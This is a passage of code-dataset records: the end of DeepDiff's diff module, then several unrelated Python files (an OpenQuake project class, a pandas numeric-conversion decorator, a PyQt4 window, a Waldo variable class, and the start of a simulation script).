print(DeepDiff(t1, t2, view='tree'))\n {'values_changed': {}}\n\n Custom objects (Tree View):\n >>> class ClassA(object):\n ... a = 1\n ... def __init__(self, b):\n ... self.b = b\n ...\n >>> t1 = ClassA(1)\n >>> t2 = ClassA(2)\n >>>\n >>> print(DeepDiff(t1, t2, view='tree'))\n {'values_changed': {}}\n\n Object attribute added (Tree View):\n >>> t2.c = \"new attribute\"\n >>> pprint(DeepDiff(t1, t2, view='tree'))\n {'attribute_added': {},\n 'values_changed': {}}\n\n Approximate decimals comparison (Significant digits after the point) (Tree View):\n >>> t1 = Decimal('1.52')\n >>> t2 = Decimal('1.57')\n >>> DeepDiff(t1, t2, significant_digits=0, view='tree')\n {}\n >>> ddiff = DeepDiff(t1, t2, significant_digits=1, view='tree')\n >>> ddiff\n {'values_changed': {}}\n >>> (change1,) = ddiff['values_changed']\n >>> change1\n \n >>> change1.t1\n Decimal('1.52')\n >>> change1.t2\n Decimal('1.57')\n >>> change1.path()\n 'root'\n\n Approximate float comparison (Significant digits after the point) (Tree View):\n >>> t1 = [ 1.1129, 1.3359 ]\n >>> t2 = [ 1.113, 1.3362 ]\n >>> ddiff = DeepDiff(t1, t2, significant_digits=3, view='tree')\n >>> ddiff\n {}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> pprint(ddiff, indent=2)\n { 'values_changed': { ,\n }}\n >>> ddiff = DeepDiff(1.23*10**20, 1.24*10**20, significant_digits=1, view='tree')\n >>> ddiff\n {'values_changed': {}}\n\n\n .. note::\n All the examples for the text view work for the tree view too. You just need to set view='tree' to get it in tree form.\n\n **Serialization**\n\n DeepDiff uses jsonpickle in order to serialize and deserialize its results into json.\n\n Serialize and then deserialize back to deepdiff\n >>> t1 = {1: 1, 2: 2, 3: 3}\n >>> t2 = {1: 1, 2: \"2\", 3: 3}\n >>> ddiff = DeepDiff(t1, t2)\n >>> jsoned = ddiff.json\n >>> jsoned\n '{\"type_changes\": {\"root[2]\": {\"py/object\": \"deepdiff.helper.RemapDict\", \"new_type\": {\"py/type\": \"__builtin__.str\"}, \"new_value\": \"2\", \"old_type\": {\"py/type\": \"__builtin__.int\"}, \"old_value\": 2}}}'\n >>> ddiff_new = DeepDiff.from_json(jsoned)\n >>> ddiff == ddiff_new\n True\n\n **Pycon 2016 Talk**\n I gave a talk about how DeepDiff does what it does at Pycon 2016.\n `Diff it to Dig it Pycon 2016 video `_\n\n And here is more info: http://zepworks.com/blog/diff-it-to-digg-it/\n\n\n \"\"\"\n\n def __init__(self,\n t1,\n t2,\n ignore_order=False,\n report_repetition=False,\n significant_digits=None,\n exclude_paths=set(),\n exclude_types=set(),\n verbose_level=1,\n view='text',\n **kwargs):\n if kwargs:\n raise ValueError((\n \"The following parameter(s) are not valid: %s\\n\"\n \"The valid parameters are ignore_order, report_repetition, significant_digits,\"\n \"exclude_paths, exclude_types, verbose_level and view.\") % ', '.join(kwargs.keys()))\n\n self.ignore_order = ignore_order\n self.report_repetition = report_repetition\n self.exclude_paths = set(exclude_paths)\n self.exclude_types = set(exclude_types)\n self.exclude_types_tuple = tuple(\n exclude_types) # we need tuple for checking isinstance\n self.hashes = {}\n\n if significant_digits is not None and significant_digits < 0:\n raise ValueError(\n \"significant_digits must be None or a non-negative integer\")\n self.significant_digits = significant_digits\n\n self.tree = TreeResult()\n\n Verbose.level = verbose_level\n\n root = DiffLevel(t1, t2)\n self.__diff(root, parents_ids=frozenset({id(t1)}))\n\n self.tree.cleanup()\n\n if view == 'tree':\n self.update(self.tree)\n del self.tree\n else:\n result_text = TextResult(tree_results=self.tree)\n result_text.cleanup() # clean up text-style result dictionary\n self.update(\n result_text\n ) # be compatible to DeepDiff 2.x if user didn't specify otherwise\n\n # TODO: adding adding functionality\n # def __add__(self, other):\n # if isinstance(other, DeepDiff):\n # result = deepcopy(self)\n # result.update(other)\n # else:\n # result = deepcopy(other)\n # for key in REPORT_KEYS:\n # if key in self:\n # getattr(self, \"_do_{}\".format(key))(result)\n\n # return result\n\n # __radd__ = __add__\n\n # def _do_iterable_item_added(self, result):\n # for item in self['iterable_item_added']:\n # pass\n\n def __report_result(self, report_type, level):\n \"\"\"\n Add a detected change to the reference-style result dictionary.\n report_type will be added to level.\n (We'll create the text-style report from there later.)\n :param report_type: A well defined string key describing the type of change.\n Examples: \"set_item_added\", \"values_changed\"\n :param parent: A DiffLevel object describing the objects in question in their\n before-change and after-change object structure.\n\n :rtype: None\n \"\"\"\n if not self.__skip_this(level):\n level.report_type = report_type\n self.tree[report_type].add(level)\n\n @staticmethod\n def __add_to_frozen_set(parents_ids, item_id):\n parents_ids = set(parents_ids)\n parents_ids.add(item_id)\n return frozenset(parents_ids)\n\n @staticmethod\n def __dict_from_slots(object):\n def unmangle(attribute):\n if attribute.startswith('__'):\n return '_{type}{attribute}'.format(\n type=type(object).__name__,\n attribute=attribute\n )\n return attribute\n\n slots = object.__slots__\n if isinstance(slots, strings):\n return {slots: getattr(object, unmangle(slots))}\n return {i: getattr(object, unmangle(i)) for i in slots}\n\n def __diff_obj(self, level, parents_ids=frozenset({}),\n is_namedtuple=False):\n \"\"\"Difference of 2 objects\"\"\"\n try:\n if is_namedtuple:\n t1 = level.t1._asdict()\n t2 = level.t2._asdict()\n else:\n t1 = level.t1.__dict__\n t2 = level.t2.__dict__\n except AttributeError:\n try:\n t1 = self.__dict_from_slots(level.t1)\n t2 = self.__dict_from_slots(level.t2)\n except AttributeError:\n self.__report_result('unprocessed', level)\n return\n\n self.__diff_dict(\n level,\n parents_ids,\n print_as_attribute=True,\n override=True,\n override_t1=t1,\n override_t2=t2)\n\n def __skip_this(self, level):\n \"\"\"\n Check whether this comparison should be skipped because one of the objects to compare meets exclusion criteria.\n :rtype: bool\n \"\"\"\n skip = False\n if self.exclude_paths and level.path() in self.exclude_paths:\n skip = True\n else:\n if isinstance(level.t1, self.exclude_types_tuple) or isinstance(\n level.t2, self.exclude_types_tuple):\n skip = True\n\n return skip\n\n def __diff_dict(self,\n level,\n parents_ids=frozenset({}),\n print_as_attribute=False,\n override=False,\n override_t1=None,\n override_t2=None):\n \"\"\"Difference of 2 dictionaries\"\"\"\n if override:\n # for special stuff like custom objects and named tuples we receive preprocessed t1 and t2\n # but must not spoil the chain (=level) with it\n t1 = override_t1\n t2 = override_t2\n else:\n t1 = level.t1\n t2 = level.t2\n\n if print_as_attribute:\n item_added_key = \"attribute_added\"\n item_removed_key = \"attribute_removed\"\n rel_class = AttributeRelationship\n else:\n item_added_key = \"dictionary_item_added\"\n item_removed_key = \"dictionary_item_removed\"\n rel_class = DictRelationship\n\n t1_keys = set(t1.keys())\n t2_keys = set(t2.keys())\n\n t_keys_intersect = t2_keys.intersection(t1_keys)\n\n t_keys_added = t2_keys - t_keys_intersect\n t_keys_removed = t1_keys - t_keys_intersect\n\n for key in t_keys_added:\n change_level = level.branch_deeper(\n notpresent,\n t2[key],\n child_relationship_class=rel_class,\n child_relationship_param=key)\n self.__report_result(item_added_key, change_level)\n\n for key in t_keys_removed:\n change_level = level.branch_deeper(\n t1[key],\n notpresent,\n child_relationship_class=rel_class,\n child_relationship_param=key)\n self.__report_result(item_removed_key, change_level)\n\n for key in t_keys_intersect: # key present in both dicts - need to compare values\n item_id = id(t1[key])\n if parents_ids and item_id in parents_ids:\n continue\n parents_ids_added = self.__add_to_frozen_set(parents_ids, item_id)\n\n # Go one level deeper\n next_level = level.branch_deeper(\n t1[key],\n t2[key],\n child_relationship_class=rel_class,\n child_relationship_param=key)\n self.__diff(next_level, parents_ids_added)\n\n def __diff_set(self, level):\n \"\"\"Difference of sets\"\"\"\n t1_hashtable = self.__create_hashtable(level.t1, level)\n t2_hashtable = self.__create_hashtable(level.t2, level)\n\n t1_hashes = set(t1_hashtable.keys())\n t2_hashes = set(t2_hashtable.keys())\n\n hashes_added = t2_hashes - t1_hashes\n hashes_removed = t1_hashes - t2_hashes\n\n items_added = [t2_hashtable[i].item for i in hashes_added]\n items_removed = [t1_hashtable[i].item for i in hashes_removed]\n\n for item in items_added:\n change_level = level.branch_deeper(\n notpresent, item, child_relationship_class=SetRelationship)\n self.__report_result('set_item_added', change_level)\n\n for item in items_removed:\n change_level = level.branch_deeper(\n item, notpresent, child_relationship_class=SetRelationship)\n self.__report_result('set_item_removed', change_level)\n\n @staticmethod\n def __iterables_subscriptable(t1, t2):\n try:\n if getattr(t1, '__getitem__') and getattr(t2, '__getitem__'):\n return True\n else: # pragma: no cover\n return False # should never happen\n except AttributeError:\n return False\n\n def __diff_iterable(self, level, parents_ids=frozenset({})):\n \"\"\"Difference of iterables\"\"\"\n # We're handling both subscriptable and non-subscriptable iterables. Which one is it?\n subscriptable = self.__iterables_subscriptable(level.t1, level.t2)\n if subscriptable:\n child_relationship_class = SubscriptableIterableRelationship\n else:\n child_relationship_class = NonSubscriptableIterableRelationship\n\n for i, (x, y) in enumerate(\n zip_longest(\n level.t1, level.t2, fillvalue=ListItemRemovedOrAdded)):\n if y is ListItemRemovedOrAdded: # item removed completely\n change_level = level.branch_deeper(\n x,\n notpresent,\n child_relationship_class=child_relationship_class,\n child_relationship_param=i)\n self.__report_result('iterable_item_removed', change_level)\n\n elif x is ListItemRemovedOrAdded: # new item added\n change_level = level.branch_deeper(\n notpresent,\n y,\n child_relationship_class=child_relationship_class,\n child_relationship_param=i)\n self.__report_result('iterable_item_added', change_level)\n\n else: # check if item value has changed\n item_id = id(x)\n if parents_ids and item_id in parents_ids:\n continue\n parents_ids_added = self.__add_to_frozen_set(parents_ids,\n item_id)\n\n # Go one level deeper\n next_level = level.branch_deeper(\n x,\n y,\n child_relationship_class=child_relationship_class,\n child_relationship_param=i)\n self.__diff(next_level, parents_ids_added)\n\n def __diff_str(self, level):\n \"\"\"Compare strings\"\"\"\n if level.t1 == level.t2:\n return\n\n # do we add a diff for convenience?\n do_diff = True\n if isinstance(level.t1, bytes_type):\n try:\n t1_str = level.t1.decode('ascii')\n t2_str = level.t2.decode('ascii')\n except UnicodeDecodeError:\n do_diff = False\n else:\n t1_str = level.t1\n t2_str = level.t2\n if do_diff:\n if u'\\n' in t1_str or u'\\n' in t2_str:\n diff = difflib.unified_diff(\n t1_str.splitlines(), t2_str.splitlines(), lineterm='')\n diff = list(diff)\n if diff:\n level.additional['diff'] = u'\\n'.join(diff)\n\n self.__report_result('values_changed', level)\n\n def __diff_tuple(self, level, parents_ids):\n # Checking to see if it has _fields. Which probably means it is a named\n # tuple.\n try:\n level.t1._asdict\n # It must be a normal tuple\n except AttributeError:\n self.__diff_iterable(level, parents_ids)\n # We assume it is a namedtuple then\n else:\n self.__diff_obj(level, parents_ids, is_namedtuple=True)\n\n def __create_hashtable(self, t, level):\n \"\"\"Create hashtable of {item_hash: item}\"\"\"\n\n def add_hash(hashes, item_hash, item, i):\n if item_hash in hashes:\n hashes[item_hash].indexes.append(i)\n else:\n hashes[item_hash] = IndexedHash([i], item)\n\n hashes = {}\n for (i, item) in enumerate(t):\n try:\n hashes_all = DeepHash(item,\n hashes=self.hashes,\n significant_digits=self.significant_digits)\n item_hash = hashes_all.get(id(item), item)\n except Exception as e: # pragma: no cover\n logger.warning(\"Can not produce a hash for %s.\"\n \"Not counting this object.\\n %s\" %\n (level.path(), e))\n else:\n if item_hash is hashes_all.unprocessed: # pragma: no cover\n logger.warning(\"Item %s was not processed while hashing \"\n \"thus not counting this object.\" %\n level.path())\n else:\n add_hash(hashes, item_hash, item, i)\n return hashes\n\n def __diff_iterable_with_contenthash(self, level):\n \"\"\"Diff of unhashable iterables. Only used when ignoring the order.\"\"\"\n t1_hashtable = self.__create_hashtable(level.t1, level)\n t2_hashtable = self.__create_hashtable(level.t2, level)\n\n t1_hashes = set(t1_hashtable.keys())\n t2_hashes = set(t2_hashtable.keys())\n\n hashes_added = t2_hashes - t1_hashes\n hashes_removed = t1_hashes - t2_hashes\n\n if self.report_repetition:\n for hash_value in hashes_added:\n for i in t2_hashtable[hash_value].indexes:\n change_level = level.branch_deeper(\n notpresent,\n t2_hashtable[hash_value].item,\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=i\n ) # TODO: what is this value exactly?\n self.__report_result('iterable_item_added', change_level)\n\n for hash_value in hashes_removed:\n for i in t1_hashtable[hash_value].indexes:\n change_level = level.branch_deeper(\n t1_hashtable[hash_value].item,\n notpresent,\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=i)\n self.__report_result('iterable_item_removed', change_level)\n\n items_intersect = t2_hashes.intersection(t1_hashes)\n\n for hash_value in items_intersect:\n t1_indexes = t1_hashtable[hash_value].indexes\n t2_indexes = t2_hashtable[hash_value].indexes\n t1_indexes_len = len(t1_indexes)\n t2_indexes_len = len(t2_indexes)\n if t1_indexes_len != t2_indexes_len: # this is a repetition change!\n # create \"change\" entry, keep current level untouched to handle further changes\n repetition_change_level = level.branch_deeper(\n t1_hashtable[hash_value].item,\n t2_hashtable[hash_value].item, # nb: those are equal!\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=t1_hashtable[hash_value]\n .indexes[0])\n repetition_change_level.additional['repetition'] = RemapDict(\n old_repeat=t1_indexes_len,\n new_repeat=t2_indexes_len,\n old_indexes=t1_indexes,\n new_indexes=t2_indexes)\n self.__report_result('repetition_change',\n repetition_change_level)\n\n else:\n for hash_value in hashes_added:\n change_level = level.branch_deeper(\n notpresent,\n t2_hashtable[hash_value].item,\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=t2_hashtable[hash_value].indexes[\n 0]) # TODO: what is this value exactly?\n self.__report_result('iterable_item_added', change_level)\n\n for hash_value in hashes_removed:\n change_level = level.branch_deeper(\n t1_hashtable[hash_value].item,\n notpresent,\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=t1_hashtable[hash_value].indexes[\n 0])\n self.__report_result('iterable_item_removed', change_level)\n\n def __diff_numbers(self, level):\n \"\"\"Diff Numbers\"\"\"\n\n if self.significant_digits is not None and isinstance(level.t1, (\n float, complex, Decimal)):\n # Bernhard10: I use string formatting for comparison, to be consistent with usecases where\n # data is read from files that were previousely written from python and\n # to be consistent with on-screen representation of numbers.\n # Other options would be abs(t1-t2)<10**-self.significant_digits\n # or math.is_close (python3.5+)\n # Note that abs(3.25-3.251) = 0.0009999999999998899 < 0.001\n # Note also that \"{:.3f}\".format(1.1135) = 1.113, but \"{:.3f}\".format(1.11351) = 1.114\n # For Decimals, format seems to round 2.5 to 2 and 3.5 to 4 (to closest even number)\n t1_s = (\"{:.%sf}\" % self.significant_digits).format(level.t1)\n t2_s = (\"{:.%sf}\" % self.significant_digits).format(level.t2)\n\n # Special case for 0: \"-0.00\" should compare equal to \"0.00\"\n if set(t1_s) <= set(\"-0.\") and set(t2_s) <= set(\"-0.\"):\n return\n elif t1_s != t2_s:\n self.__report_result('values_changed', level)\n else:\n if level.t1 != level.t2:\n self.__report_result('values_changed', level)\n\n def __diff_types(self, level):\n \"\"\"Diff types\"\"\"\n level.report_type = 'type_changes'\n self.__report_result('type_changes', level)\n\n def __diff(self, level, parents_ids=frozenset({})):\n \"\"\"The main diff method\"\"\"\n if level.t1 is level.t2:\n return\n\n if self.__skip_this(level):\n return\n\n if type(level.t1) != type(level.t2):\n self.__diff_types(level)\n\n elif isinstance(level.t1, strings):\n self.__diff_str(level)\n\n elif isinstance(level.t1, numbers):\n self.__diff_numbers(level)\n\n elif isinstance(level.t1, Mapping):\n self.__diff_dict(level, parents_ids)\n\n elif isinstance(level.t1, tuple):\n self.__diff_tuple(level, parents_ids)\n\n elif isinstance(level.t1, (set, frozenset)):\n self.__diff_set(level)\n\n elif isinstance(level.t1, Iterable):\n if self.ignore_order:\n self.__diff_iterable_with_contenthash(level)\n else:\n self.__diff_iterable(level, parents_ids)\n\n else:\n self.__diff_obj(level, parents_ids)\n\n return\n\n @property\n def json(self):\n if not hasattr(self, '_json'):\n # copy of self removes all the extra attributes since it assumes\n # we have only a simple dictionary.\n copied = self.copy()\n self._json = jsonpickle.encode(copied)\n return self._json\n\n @json.deleter\n def json(self):\n del self._json\n\n @classmethod\n def from_json(self, value):\n return jsonpickle.decode(value)\n\n\nif __name__ == \"__main__\": # pragma: no cover\n if not py3:\n import sys\n sys.exit(\n \"Please run with Python 3 to verify the doc strings: python3 -m deepdiff.diff\"\n )\n import doctest\n doctest.testmod()\n","sub_path":"deepdiff/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":46207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"361091677","text":"import os\nimport json\nfrom ipywidgets import widgets\n\nimport mbt_comm\nfrom mbt_comm import message_set\nfrom serial import Dictable\nfrom cells import Cells\nfrom urllib import quote_plus\n\nfrom resources import Resources\nfrom models import Models\n\nclass Project(Dictable):\n __public__ = [\"resources\", \"models\", \"cells\"]\n\n def __init__(self, resources, models, cells = None):\n self.wid_prj_label = widgets.HTML(value=\"Project: \",\n font_weight=\"bold\")\n #\n # RESOURCES\n #\n self.resources = resources\n\n #\n # MODELS\n #\n self.mod = self.models = models\n self.models.parent_set(self)\n\n #\n # CELLS\n #\n if cells is None:\n self.cells = Cells([])\n else:\n self.cells = cells\n\n self.wid_prj_box = widgets.VBox(\n children=[self.wid_prj_label,\n self.resources.widget_get(),\n self.models.widget_get()],\n border_style=\"solid\", border_width=\"1px\", padding=\"8px\",\n border_radius=\"4px\")\n\n def cells_add(self, cells):\n self.cells = Cells(cells)\n\n @classmethod\n def load(cls, name, is_primary=True):\n prjdir = os.path.join(mbt_comm.OQ_MBT_HOME, quote_plus(name))\n prjdir_old = os.path.join(mbt_comm.OQ_MBT_HOME, name)\n\n if os.path.isdir(prjdir) is False:\n if os.path.isdir(prjdir_old) is True:\n # migration case\n os.rename(prjdir_old, prjdir)\n else:\n message_set(\"'%s' project not exists\" % name)\n return None\n\n filename = os.path.join(prjdir, 'project.json')\n if os.path.isfile(filename):\n # here the loading of project\n with open(filename, \"r\") as infile:\n prj = Dictable.deserialize(json.load(infile))\n else:\n # all parts must be initialized with defaults and\n # the json file must be created\n prj = Project([], [])\n prj.title_set(prjdir, name[:-4])\n prj.resources.parent_set(prj)\n if is_primary is True:\n prj.cells.load()\n prj.current_set()\n\n return prj\n\n @classmethod\n def create(cls, title):\n newdir = os.path.join(mbt_comm.OQ_MBT_HOME,\n quote_plus(title) + mbt_comm.OQ_MBT_SFX)\n if os.path.isdir(newdir):\n msg = \"'%s' project already exists\" % title\n return (None, msg)\n\n try:\n os.mkdir(newdir)\n except:\n msg = \"'%s' project creation failed\" % title\n return (None, msg)\n\n msg = \"'%s' project created\" % title\n prj = Project(Resources(), Models(), Cells())\n\n prj.title_set(newdir, title)\n prj.save()\n\n return (prj, msg)\n\n\n def save(self):\n filename = os.path.join(self.folder, 'project.json')\n\n with open(filename, \"w\") as outfile:\n json.dump(self.to_dict(), outfile, sort_keys=True, indent=4)\n\n return True\n\n def current_set(self):\n with open(os.path.join(mbt_comm.OQ_MBT_HOME, 'CURRENT_PRJ'), 'w') as f:\n title, _ = self.title_get()\n f.write(str(title))\n\n\n @classmethod\n def current_get(cls):\n with open(os.path.join(mbt_comm.OQ_MBT_HOME, 'CURRENT_PRJ'), 'r') as f:\n return f.read()\n return None\n\n def widget_get(self):\n return self.wid_prj_box\n\n def clean(self):\n # resources\n #self.res_contbox.children = []\n\n #for item in self.resources:\n # del item\n #self.resources = []\n # print \"TODO clean resources\"\n\n # models\n # print \"TODO clean models\"\n # wid_new_acc = widgets.Accordion(children=[], width=800)\n\n # self.models_contbox.children = [wid_new_acc]\n # del(self.models_cont)\n # self.models_cont = wid_new_acc\n pass\n\n def title_set(self, folder, name):\n self.title = name\n self.folder = folder\n self.wid_prj_label.value = \"Project: \" + name\n\n def title_get(self):\n return (self.title, self.folder)\n\n def __getitem__(self, key):\n id = self.resources.resource_find(key)\n if id == -1:\n raise KeyError\n return self.resources.resource_get(id).value\n\n def clear(self, key):\n id = self.resources.resource_find(key)\n if id == -1:\n raise KeyError\n return self.resources.resource_get(id).clear()\n\n def keys(self):\n return [x.key for x in self.resources.resources]\n\n def objpath(self, objname, is_leaf=True):\n if is_leaf:\n return (mbt_comm.OQ_MBT_HOME, os.path.join(quote_plus(self.title),\n 'data', quote_plus(objname)))\n else:\n return os.path.join(quote_plus(self.title), quote_plus(objname))\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102470212","text":"import pandas as pd\nimport re\nfrom typing import Union, Callable\nfrom functools import wraps\n\n\ndef to_numeric(func: Callable):\n \"\"\"\n 将 DataFrame 或者 Series 尽可能地转为数字的装饰器\n\n Parameters\n ----------\n func : object\n 返回结果为 DataFrame 或者 Series 的函数\n \"\"\"\n\n ignore = ['股票代码', '基金代码', '代码', '市场类型']\n\n @wraps(func)\n def run(*args, **kwargs):\n values = func(*args, **kwargs)\n if isinstance(values, pd.DataFrame):\n for column in values.columns:\n if column not in ignore:\n\n values[column] = values[column].apply(convert)\n elif isinstance(values, pd.Series):\n for index in values.index:\n if index not in ignore:\n\n values[index] = convert(values[index])\n return values\n\n def convert(o: Union[str, int, float]) -> Union[str, float, int]:\n if not re.findall('\\d', str(o)):\n return o\n try:\n o = float(o)\n except:\n pass\n return o\n return run\n","sub_path":"efinance/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610300907","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInterface de um simulador de tomada de decisão\n\nauthor: Cassiano Kunsch das Neves\nlast edited: 19/04/2015\n\"\"\"\nfrom PyQt4.QtGui import (QMainWindow, QDesktopWidget, QApplication, QWidget, QPushButton, QAction, QFileDialog)\nfrom View.MainTabWidget import MainTabWidget\n#from View.Window_dados import WinDados\nfrom View.Patio import Patio\n\n#__________________________________________________CLASSE_______________________________________________________________\n\nclass MainWindow(QMainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.config()\n self.settings()\n\n def settings(self):\n screen = QDesktopWidget().screenGeometry()\n self.larg = screen.width()\n self.alt = screen.height()\n self.main_widget = MainTabWidget(self.larg, self.alt)\n self.showMaximized()\n #self.config()\n self.setCentralWidget(self.main_widget)\n #self.exec()\n\n def config(self):\n\n openFile = QAction('Abrir Pátio', self)\n openFile.setShortcut('Ctrl+O')\n openFile.setStatusTip('Inserir os dados para simular')\n openFile.triggered.connect(self.chama_dialog)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n fileMenu.addAction(openFile)\n\n def showDialog(self):\n self.diag = WinDados()\n self.diag.setModal(True)\n self.diag.exec_()\n\n def chama_dialog(self):\n self.patio = Patio()\n self.patio.showDialog()\n\n","sub_path":"Aplicativo_TDD/View/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"239648590","text":"import threading, numbers\nimport util\nfrom waldo.lib.proto_compiled.varStoreDeltas_pb2 import VarStoreDeltas\n\nfrom waldoObj import WaldoObj\n\n\nclass _SingleThreadReferenceBase(WaldoObj):\n '''\n Only one thread of control can access this variable. Example:\n local variables or sequence peered variables. Antonyms: peered\n data and endpoint global data.\n '''\n \n def __init__(self,host_uuid,peered,init_val,version_obj):\n '''\n @param {bool} peered --- True if this variable is a piece of\n sequence local data. False if it's just a regular-old local\n variable.\n '''\n self.host_uuid = host_uuid\n self.uuid = util.generate_uuid()\n self.val = init_val\n self.version_obj = version_obj \n self.peered = peered\n\n def is_peered(self):\n return self.peered\n \n def serializable_var_tuple_for_network(\n self,parent_delta,var_name,invalid_listener,force):\n '''\n The runtime automatically synchronizes data between both\n endpoints. When one side has updated a peered variable, the\n other side needs to attempt to apply those changes before\n doing further work. This method grabs the val and version\n object of the dirty element associated with invalid_listener.\n Using these data, plus var_name, it constructs a named tuple\n for serialization. (@see\n util._generate_serialization_named_tuple)\n\n Note: if the val of this object is another Reference object,\n then we recursively keep generating named tuples and embed\n them in the one we return.\n\n Note: we only serialize peered data. No other data gets sent\n over the network; therefore, it should not be serialized.\n\n @param {*Delta or VarStoreDeltas} parent_delta --- Append any\n message that we create here to this message.\n \n @param {String} var_name --- Both sides of the connection need\n to agree on a common name for the variable being serialized.\n This is to ensure that when the data are received by the other\n side we know which variable to put them into. This value is\n only really necessary for the outermost wrapping of the named\n type tuple, but we pass it through anyways.\n\n @param {bool} force --- True if regardless of whether modified\n or not we should serialize. False otherwise. (We migth want\n to force for instance the first time we send sequence data.)\n \n @returns {bool} --- True if some subelement was modified,\n False otherwise.\n '''\n # a val can either point to a waldo reference, a python value,\n # or a list/map of waldo references or a list/map of python\n # values.\n var_data = self.val\n\n if (not force) and (not self.version_obj.has_been_written_since_last_message):\n if (isinstance(var_data,numbers.Number) or\n util.is_string(var_data) or isinstance(var_data,bool)):\n # nothing to do because this value has not been\n # written. NOTE: for list/dict types, must actually\n # go through to ensure no subelements were written.\n return False\n\n sub_element_modified = False\n if self.py_val_serialize(parent_delta,var_data,var_name):\n sub_element_modified = True\n \n elif isinstance(var_data,list):\n list_delta = parent_delta.internal_list_delta\n list_delta.parent_type = VarStoreDeltas.INTERNAL_LIST_CONTAINER\n\n if force:\n # perform each operation as a write...\n self.version_obj.add_all_data_to_delta_list(\n list_delta,var_data,invalid_listener)\n sub_element_modified = True\n else:\n # if all subelements have not been modified, then we\n # do not need to keep track of these changes.\n # wVariable.waldoMap, wVariable.waldoList, or\n # wVariable.WaldoUserStruct will get rid of it later.\n sub_element_modified = self.version_obj.add_to_delta_list(\n list_delta,var_data,invalid_listener)\n\n elif isinstance(var_data,dict):\n map_delta = parent_delta.internal_map_delta\n map_delta.parent_type = VarStoreDeltas.INTERNAL_MAP_CONTAINER\n\n if force:\n # perform each operation as a write...\n self.version_obj.add_all_data_to_delta_list(\n map_delta,var_data,invalid_listener)\n sub_element_modified = True\n else:\n # if all subelements have not been modified, then we\n # do not need to keep track of these changes.\n # wVariable.waldoMap, wVariable.waldoList, or\n # wVariable.WaldoUserStruct will get rid of it later.\n sub_element_modified = self.version_obj.add_to_delta_list(\n map_delta,var_data,invalid_listener)\n\n \n else:\n # creating deltas for cases where internal data are waldo\n # references.... should have been overridden in\n # wVariables.py\n util.logger_assert('Serializing unknown type.')\n\n self.version_obj.has_been_written_since_last_message = False\n return sub_element_modified\n \n def py_val_serialize(self,parent,var_data,var_name):\n '''\n @param {} parent --- Either a ContainerAction a VarStoreDeltas.\n\n FIXME: unclear if actually need var_name for all elements\n py_serialize-ing, or just py variables that are in the\n top-level.\n\n @returns {bool} --- True if var_data was a python value type\n and we put it into parent. False otherwise.\n \n If is python value type, then adds a delta message to\n parent. Otherwise, does nothing.\n '''\n is_value_type = False\n delta = None\n if isinstance(var_data, numbers.Number):\n # can only add a pure number to var store a holder or to\n # an added key\n if parent.parent_type == VarStoreDeltas.VAR_STORE_DELTA:\n delta = parent.num_deltas.add()\n elif parent.parent_type == VarStoreDeltas.CONTAINER_ADDED:\n parent.added_what_num = var_data\n elif parent.parent_type == VarStoreDeltas.CONTAINER_WRITTEN:\n parent.what_written_num = var_data\n #### DEBUG\n else:\n util.logger_assert('Unexpected parent type in py_serialize')\n #### END DEBUG\n \n is_value_type = True\n \n elif util.is_string(var_data):\n if parent.parent_type == VarStoreDeltas.VAR_STORE_DELTA:\n delta = parent.text_deltas.add()\n elif parent.parent_type == VarStoreDeltas.CONTAINER_ADDED:\n parent.added_what_text = var_data\n elif parent.parent_type == VarStoreDeltas.CONTAINER_WRITTEN:\n parent.what_written_text = var_data\n \n #### DEBUG\n else:\n util.logger_assert('Unexpected parent type in py_serialize')\n #### END DEBUG \n \n is_value_type = True\n \n elif isinstance(var_data,bool):\n if parent.parent_type == VarStoreDeltas.VAR_STORE_DELTA:\n delta = parent.true_false_deltas.add()\n elif parent.parent_type == VarStoreDeltas.CONTAINER_ADDED:\n parent.added_what_tf = var_data\n elif parent.parent_type == VarStoreDeltas.CONTAINER_WRITTEN:\n parent.what_written_tf = var_data \n #### DEBUG\n else:\n util.logger_assert('Unexpected parent type in py_serialize')\n #### END DEBUG \n\n \n is_value_type = True\n\n if delta != None:\n # all value types have same format\n delta.var_name = var_name\n delta.var_data = var_data\n \n return is_value_type\n\n def get_val(self,invalid_listener):\n return self.val\n\n def write_if_different(self,invalid_listener,new_val):\n '''\n Will always write. Only reason method is\n named_write_if_different is to keep it consistent with\n interface for peered variables.\n '''\n self.val = new_val\n \n def write_val(self,invalid_listener,new_val,copy_if_peered=True):\n '''\n Writes to a copy of internal val, dirtying it\n '''\n self.val = new_val\n","sub_path":"waldo/lib/singleThreadReference.py","file_name":"singleThreadReference.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315651528","text":"#immediate things to do:\n#1. finish statistics X\n#2. add S(q,w) X\n#4. add tail corrections\n#5. Add final configuration\n#6. add a simple user interface function\n#7. clean up, make tidy\n#8. Add final configuration\n#9. add lots of comments\n#10. go through a second time to check I understand everything\n\nimport numpy as np\nimport cmath\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom mpl_toolkits.mplot3d import Axes3D\nimport random \nimport os\nimport subprocess as sub\nsub.call(\"rm -rf *.dat\",shell=True)\n\n#simulation parameters organized my use or type:\n#**************************************************************\n#The user will create different physical 